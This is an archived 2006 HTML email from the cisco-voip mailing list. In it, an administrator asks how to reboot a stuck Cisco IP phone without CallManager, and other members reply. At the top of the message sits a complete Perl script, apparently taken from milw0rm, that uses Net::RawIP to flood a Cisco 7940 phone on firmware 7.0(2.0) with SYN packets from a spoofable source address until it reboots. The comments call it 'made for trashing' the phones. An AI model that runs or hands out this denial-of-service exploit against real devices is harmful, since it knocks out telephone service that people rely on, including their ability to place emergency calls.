<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.2802" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><PRE>#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]
</PRE></DIV>
<BLOCKQUOTE
style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px">
<DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A title=lelio@uoguelph.ca href="mailto:lelio@uoguelph.ca">Lelio Fulgenzi</A>
</DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A title=kthorngr@cisco.com
href="mailto:kthorngr@cisco.com">Kevin Thorngren</A> ; <A
title=Hans-Peter.Walter@tds.de
href="mailto:Hans-Peter.Walter@tds.de">Hans-Peter Walter</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Cc:</B> <A title=cisco-voip@puck.nether.net
href="mailto:cisco-voip@puck.nether.net">cisco-voip@puck.nether.net</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Friday, February 17, 2006 7:53
PM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> Re: [cisco-voip] Remotely
rebooting Phone without usingCallmanager(in CM not connected, but can still
ping/http)</DIV>
<DIV><BR></DIV>
<DIV><FONT face=Arial size=2>aren't there a few exploits out there that cause
a phone to reboot? ;)</FONT></DIV>
<DIV> </DIV>
<BLOCKQUOTE
style="PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px">
<DIV style="FONT: 10pt arial">----- Original Message ----- </DIV>
<DIV
style="BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: black"><B>From:</B>
<A title=kthorngr@cisco.com href="mailto:kthorngr@cisco.com">Kevin
Thorngren</A> </DIV>
<DIV style="FONT: 10pt arial"><B>To:</B> <A title=Hans-Peter.Walter@tds.de
href="mailto:Hans-Peter.Walter@tds.de">Hans-Peter Walter</A> </DIV>
<DIV style="FONT: 10pt arial"><B>Cc:</B> <A title=cisco-voip@puck.nether.net
href="mailto:cisco-voip@puck.nether.net">cisco-voip@puck.nether.net</A>
</DIV>
<DIV style="FONT: 10pt arial"><B>Sent:</B> Friday, February 17, 2006 7:46
PM</DIV>
<DIV style="FONT: 10pt arial"><B>Subject:</B> Re: [cisco-voip] Remotely
rebooting Phone without using Callmanager(in CM not connected, but can still
ping/http)</DIV>
<DIV><BR></DIV>Not sure of any other ideas at this point. Just curious if
there is any Skinny traffic from the phone to CCM. Use Network Monitor on
the Primary CCM to see if the phone is attempting to create a TCP connection
to the CCM server and if it is failing.<BR><BR>Kevin<BR>On Feb 17, 2006, at
7:38 PM, Hans-Peter Walter wrote:<BR><BR>
<BLOCKQUOTE><BR><?smaller>hi,<?/smaller> <BR><?smaller>we have a problem
with a SRST-config at a remote site, so I played around and set a <?/smaller><BR><?smaller>line of a phone to "Auto Answer with
speakerphone" and could hear some servers running in the background, <?/smaller><BR><?smaller>and did some testing. The SRST still doesn't work
properly, but thats another story...<?/smaller> <BR><BR><?smaller>Now the
phone some how stucks. I can ping it, I can go to the phone website
http://<phone-ip>, but it <?/smaller><BR><?smaller>is *NOT*
registered in Callmanager and not on the SRST-Router. <?/smaller><BR><?smaller>I denied access for that phone to the callmanager
(hoped it would try to reboot) ==> no success<?/smaller>
<BR><?smaller>I rebooted the SRST-Router (default-gateway of the phone)
==> no success<?/smaller> <BR><?smaller>I shut down and enabled the
switch-port where the phone is connected ==> no success<?/smaller> <BR><?smaller>I even rebooted the entire switch ;-) ==> no success<?/smaller> <BR><?smaller>After all these actions I can still ping
/ http to the phone...<?/smaller> <BR><BR><?smaller>I wish I had PoE
there, because I think I just would need unplug power....<?/smaller> <BR><?smaller>soooo: Is there another way to reboot a phone *without* the
Callmanager,<?/smaller> <BR><?smaller>maybe something hidden like
http://<phine-ip>/admin or something?<?/smaller>
<BR><BR><?smaller>thanks and a nice weekend...<?/smaller> <BR><?smaller>HP<?/smaller>_______________________________________________<BR>cisco-voip
mailing
list<BR>cisco-voip@puck.nether.net<BR>https://puck.nether.net/mailman/listinfo/cisco-voip<BR></BLOCKQUOTE>
<P>
<HR>
<P></P>_______________________________________________<BR>cisco-voip mailing
list<BR>cisco-voip@puck.nether.net<BR>https://puck.nether.net/mailman/listinfo/cisco-voip<BR></BLOCKQUOTE>
<P>
<HR>
<P></P>_______________________________________________<BR>cisco-voip mailing
list<BR>cisco-voip@puck.nether.net<BR>https://puck.nether.net/mailman/listinfo/cisco-voip<BR></BLOCKQUOTE></BODY></HTML>